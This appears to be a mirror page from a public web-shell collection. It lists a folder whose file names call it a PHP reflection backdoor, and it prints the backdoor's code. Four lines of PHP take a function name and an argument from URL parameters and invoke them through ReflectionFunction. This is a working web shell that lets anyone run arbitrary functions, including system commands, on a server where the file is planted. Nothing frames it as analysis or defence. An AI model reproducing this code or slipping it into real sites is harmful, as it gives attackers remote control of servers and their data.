mirror of
https://github.com/tennc/webshell
synced 2024-11-21 18:53:03 +00:00
.. | ||
11.jpg | ||
PHP reflection.php.txt | ||
PHP反射后门.php.txt | ||
Readme.md |
code:
<?php
$func = new ReflectionFunction($_GET[m]);
echo $func->invokeArgs(array($_GET[c]));
?>